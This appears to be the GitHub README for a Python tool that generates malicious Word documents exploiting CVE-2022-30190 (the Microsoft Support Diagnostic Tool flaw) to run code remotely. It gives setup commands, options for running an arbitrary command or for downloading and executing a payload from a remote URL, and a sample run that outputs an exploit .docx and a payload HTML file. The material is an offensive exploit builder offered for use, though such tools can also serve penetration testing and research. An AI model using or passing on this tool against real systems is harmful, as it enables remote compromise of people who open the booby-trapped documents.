Skip to content

Latest commit

 

History

History
42 lines (33 loc) · 1.3 KB

README.md

File metadata and controls

42 lines (33 loc) · 1.3 KB

CVE-2022-30190 - Microsoft Support Diagnostic Tool

About

This script will attempt to create a Microsoft Office document which will remotely execute code.

Setup

git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help

Options

usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
                         [--download_url DOWNLOAD_URL]

Generate CVE-2022-30190 Word documents.

optional arguments:
  -h, --help            show this help message and exit
  --html HTML           URL to online exploit HTML file
  --cmd CMD             Command you want to execute on run
  --downexec            Enable download and execute mode
  --download_url DOWNLOAD_URL
                        Source where to download and execute from

Examples

$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Starting CVE-2022-30190 Generator...
[•] Created by https://github.com/joshuavanderpoll
[•] Using Word document: Original.docx
[•] Deflating Word document...
[•] Deflated Word document.
[√] Exploited Word document saved in "./builds/Exploit.docx" (1109 bytes).
[√] Exploit HTML file saved in "./builds/Exploit.html" (4241 bytes).